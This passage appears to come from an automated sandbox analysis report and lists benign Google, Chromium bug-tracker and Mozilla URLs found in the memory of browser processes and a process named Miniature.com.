                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1804165498.000071EC00380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1804165498.000071EC00380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1804165498.000071EC00380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1804165498.000071EC00380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                Source: chrome.exe, 00000015.00000003.1678378459.00000104002A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726902512.0000010400C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r1.crl0
                Source: chrome.exe, 00000015.00000002.1724467499.00000104006A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstorePoCiXPoI=
                Source: chrome.exe, 00000015.00000003.1642129761.000033EC006C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1742473501.000033EC0079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641591808.000033EC003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641829346.000033EC003AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                Source: chrome.exe, 00000015.00000003.1642129761.000033EC006C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1742473501.000033EC0079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641591808.000033EC003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641829346.000033EC003AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                Source: chrome.exe, 00000015.00000002.1742473501.000033EC0079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
                Source: chrome.exe, 00000015.00000002.1742473501.000033EC0079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641591808.000033EC003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641829346.000033EC003AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                Source: chrome.exe, 00000015.00000002.1723045820.000001040020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                Source: chrome.exe, 00000015.00000002.1723045820.000001040020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                Source: chrome.exe, 00000015.00000002.1722870036.000001040018C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000002.1852071829.000071EC0016C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.26.drString found in binary or memory: https://chromewebstore.google.com/
                Source: msedge.exe, 00000018.00000002.1852071829.000071EC0016C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/q
                Source: chrome.exe, 00000015.00000002.1727097599.0000010400CB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
                Source: chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                Source: chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/_
                Source: chrome.exe, 00000015.00000003.1638059900.00002864002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1638078028.00002864002EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                Source: chrome.exe, 00000015.00000002.1722378153.000001040001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724716741.0000010400724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724518566.00000104006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724193686.00000104005C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726902512.0000010400C4C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000002.1851369585.000071EC00040000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.26.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                Source: chrome.exe, 00000015.00000002.1725442700.0000010400854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
                Source: chrome.exe, 00000015.00000002.1725442700.0000010400854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
                Source: chrome.exe, 00000015.00000002.1726390613.0000010400A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
                Source: chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                Source: chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                Source: chrome.exe, 00000015.00000002.1724332611.000001040063C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                Source: Miniature.com, 00000010.00000002.2127699132.0000000004941000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2125663035.0000000001C8B000.00000004.00000020.00020000.00000000.sdmp, A1NG4W.16.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
